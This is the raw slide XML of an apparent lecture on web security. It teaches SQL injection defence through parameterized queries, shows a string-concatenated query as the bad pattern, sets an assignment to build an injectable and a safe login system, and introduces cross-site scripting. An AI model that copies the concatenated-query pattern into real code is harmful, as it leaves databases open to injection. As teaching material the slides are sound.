              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>After: Each parameter is passed to the query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Allows the database to distinguish between code and data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6305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Parameterized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Query example</a:t>
            </a:r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060848"/>
            <a:ext cx="9062898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endParaRPr lang="da-DK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a-DK" sz="16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link = new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mysqli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", "", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" b="1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da-DK" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mydb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="16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da-DK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a-DK" sz="16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a-DK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($link-&gt;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connect_error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da-DK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a-DK" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  die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('Connect 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 ('.$link-&gt;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connect_errno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.') '.$link-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>connect_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1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da-DK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a-DK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da-DK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a-DK" sz="16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da-DK" sz="1600" b="1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da-DK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"SELECT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desc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pyear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FROM products WHERE id=?";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$stmt = $link-&gt;prepare($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$stmt-&gt;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bind_param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',$_REQUEST['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pid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']);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="16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bind_result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desc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pyear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$stmt-&gt;execute();</a:t>
            </a:r>
          </a:p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while($stmt-&gt;fetch()){		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB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echo '('.$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pyear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.') : '.$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desc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.'&lt;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/&gt;';	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endParaRPr lang="en-GB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075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Stored procedures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Are you immune to SQL injection if you use stored procedures?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Yes, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" u="sng" dirty="0" smtClean="0"/>
              <a:t>IF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> you used parameterization -&gt; read:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="393700" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>www.codeproject.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>/Tips/586207/How-to-prevent-SQL-Injection-in-Stored-Procedures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81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Parameterized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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543956" cy="4389437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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en-GB" dirty="0" smtClean="0"/>
              <a:t>parameterized queries*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Java EE – use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() with bind variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.NET – use parameterized queries like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>SqlCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>OleDbCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() with bind variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>PHP – use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t> prepared statements or use PDO with strongly typed parameterized queries (using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>bindParam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Hibernate - use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>createQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() with bind variables</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(called named parameters in Hibernate)</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="da-DK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>Is it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Explain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB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</a:rPr>
              <a:t>*http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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321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Lesson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>learned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  <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Never</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> construct SQL statements using string concatenation of unchecked input values!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="&quot;No&quot; Symbol 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2714612" y="3500438"/>
            <a:ext cx="3214710" cy="3143272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5852" y="4786322"/>
            <a:ext cx="608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"SELECT * FROM user WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>userId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> = ‘”+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>strUserName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74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Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>update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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1"/>
              <a:t>watchguardsecuritycenter.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK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204864"/>
            <a:ext cx="4896544" cy="300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2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r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Assignment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t>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36581"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>userinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> in a database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="642910" y="1922441"/>
            <a:ext cx="6286544" cy="2444767"/>
            <a:chOff x="642910" y="2500306"/>
            <a:chExt cx="7715304" cy="3000396"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="12" name="Group 41"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6215074" y="2500306"/>
              <a:ext cx="1928826" cy="2214578"/>
              <a:chOff x="6715140" y="1928802"/>
              <a:chExt cx="1928826" cy="2214578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6715140" y="1928802"/>
                <a:ext cx="1928826" cy="22145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715140" y="1928802"/>
                <a:ext cx="11865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400" b="1" dirty="0" err="1" smtClean="0"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rPr>
                  <a:t>Login</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="da-DK" sz="1400" b="1" dirty="0" smtClean="0"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da-DK" sz="1400" b="1" dirty="0" err="1" smtClean="0"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rPr>
                  <a:t>failed</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="14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642910" y="2500306"/>
              <a:ext cx="1928826" cy="2214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2910" y="2500306"/>
              <a:ext cx="13580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b="1" dirty="0" err="1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Add</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="da-DK" sz="1400" b="1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 new </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="da-DK" sz="1400" b="1" dirty="0" err="1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user</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1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85786" y="3143248"/>
              <a:ext cx="1071570" cy="214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2910" y="2786058"/>
              <a:ext cx="1059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 err="1" smtClean="0">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Username</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="da-DK" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="14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66368" y="4429133"/>
              <a:ext cx="691054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3000364" y="2500306"/>
              <a:ext cx="1928826" cy="2214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00364" y="2500306"/>
              <a:ext cx="1136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b="1" dirty="0" err="1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Login</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="da-DK" sz="1400" b="1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 page</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="1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Can 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5072066" y="4714884"/>
              <a:ext cx="857256" cy="78581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DB</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Down Arrow 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5357818" y="3714752"/>
              <a:ext cx="285752" cy="857256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9" name="Shape 18"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="4" idx="2"/>
              <a:endCxn id="14" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="3143240" y="3178966"/>
              <a:ext cx="392909" cy="3464743"/>
            </a:xfrm>
            <a:prstGeom prst="curvedConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="381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42910" y="3478413"/>
              <a:ext cx="1021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 smtClean="0">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Password:</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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85786" y="3786190"/>
              <a:ext cx="1071570" cy="214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143240" y="3143248"/>
              <a:ext cx="1071570" cy="214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00364" y="2786058"/>
              <a:ext cx="1059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 err="1" smtClean="0">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Username</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="da-DK" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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00364" y="3478413"/>
              <a:ext cx="1021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 smtClean="0">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Password:</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB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143240" y="3786190"/>
              <a:ext cx="1071570" cy="214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3" name="Group 42"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6376646" y="2928934"/>
              <a:ext cx="1981568" cy="2214578"/>
              <a:chOff x="6286512" y="3143248"/>
              <a:chExt cx="1981568" cy="221457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286512" y="3143248"/>
                <a:ext cx="1928826" cy="22145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286512" y="3143248"/>
                <a:ext cx="9893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400" b="1" dirty="0" err="1" smtClean="0"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rPr>
                  <a:t>Login</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="da-DK" sz="1400" b="1" dirty="0" smtClean="0"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rPr>
                  <a:t> OK</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="14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286512" y="3429000"/>
                <a:ext cx="19815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400" dirty="0" err="1" smtClean="0">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>Welcome</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="da-DK" sz="1400" dirty="0" smtClean="0">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t> &lt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="da-DK" sz="1400" dirty="0" err="1" smtClean="0">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>username</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="da-DK" sz="1400" dirty="0" smtClean="0">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&gt;</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" sz="1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4" name="Right Arrow 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5000628" y="3286124"/>
              <a:ext cx="1071570" cy="4286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95260" y="4429132"/>
              <a:ext cx="691054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467544" y="4432562"/>
            <a:ext cx="8229600" cy="2236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lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>two</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> versions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1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da-DK" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0"/>
              <a:t> IS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>vulerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1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da-DK" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> is NOT vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRP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da-DK" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Test and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>verify</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt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endParaRPr lang="da-DK" dirty="0" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="730250" lvl="1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79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Studen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>presentation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XSS – by Marek </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Furak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2995116"/>
            <a:ext cx="73025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48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XSS – Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Scripting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dirty="0" smtClean="0"/>
              <a:t>An attacker exploits an web application to send malicious code (normally JavaScript) to a victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Persistent attack where user input is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>storred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t> on the server and following displayed to other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0"/>
              <a:t>- chat forums, blogs, comments etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Systems are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ulnerable if user input is not filtered before it is shown to other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8"/>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>XSS is not an attack on the web application – but the users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Using JavaScript it is possible to redirect victims to a constructed website, steal cookies, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144823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Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>nonpersistent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/>
              <a:t>http://testasp.vulnweb.com/Search.asp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0"/>
              <a:t> HTML tags in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>box</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" smtClean="0"/>
              <a:t> design links to trick a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>*http://www.acunetix.com/websitesecurity/xss.htm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3643314"/>
            <a:ext cx="3390736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a-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>Bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" err="1" smtClean="0"/>
              <a:t>bla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0" smtClean="0"/>
